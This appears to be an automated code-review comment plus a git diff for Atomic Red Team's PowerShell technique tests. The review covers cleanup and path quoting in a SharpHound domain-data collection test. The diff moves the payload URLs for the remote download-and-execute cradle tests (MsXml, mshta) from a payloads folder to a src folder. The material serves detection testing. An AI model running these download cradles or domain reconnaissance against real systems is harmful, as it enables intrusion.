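Review bot: The cleanup for "Run BloodHound from local disk" removes the archive from `#{file_path}` while the attack command writes it with `-OutputDirectory #{output_path}`, so overriding output_path leaves the collected domain data on disk; the second cleanup line should be `Remove-Item #{output_path}\*BloodHound.zip -Force`. In the same test the prereq check and the import use the path unquoted (`Test-Path #{file_path}\SharpHound.ps1`, `import-module #{file_path}\SharpHound.ps1`) while get_prereq_command quotes it, so a PathToAtomicsFolder containing a space fails the check and the import but not the download; quote both the way the download line does. The description still says the data is stored in "the temp directory on the machine", which no longer matches the command, and the third test's write-host says execution happens "from $env:temp" although nothing in that command uses it — both should refer to `#{output_path}`. The argument types mix `type: string` (internal_domain) and `type: String` (file_path, output_path); one spelling should be used throughout.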
@@ -88,7 +131,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -99,14 +142,14 @@ atomic_tests:
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
- Provided by https://github.com/mgreen27/mgreen27.github.i
+ Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -124,7 +167,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -142,7 +185,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
executor:
name: command_prompt
elevation_required: false
diff --git a/atomics/T1086/payloads/mshta.sct b/atomics/T1086/src/mshta.sct
similarity index 100%
rename from atomics/T1086/payloads/mshta.sct
rename to atomics/T1086/src/mshta.sct
diff --git a/atomics/T1086/payloads/test.ps1 b/atomics/T1086/src/test.ps1
similarity index 100%
rename from atomics/T1086/payloads/test.ps1
rename to atomics/T1086/src/test.ps1
diff --git a/atomics/T1086/payloads/test.sct b/atomics/T1086/src/test.sct
similarity index 100%
rename from atomics/T1086/payloads/test.sct
rename to atomics/T1086/src/test.sct
diff --git a/atomics/T1086/payloads/test.xml b/atomics/T1086/src/test.xml
similarity index 100%
rename from atomics/T1086/payloads/test.xml
rename to atomics/T1086/src/test.xml
diff --git a/atomics/T1086/payloads/test.xsl b/atomics/T1086/src/test.xsl
similarity index 100%
rename from atomics/T1086/payloads/test.xsl
rename to atomics/T1086/src/test.xsl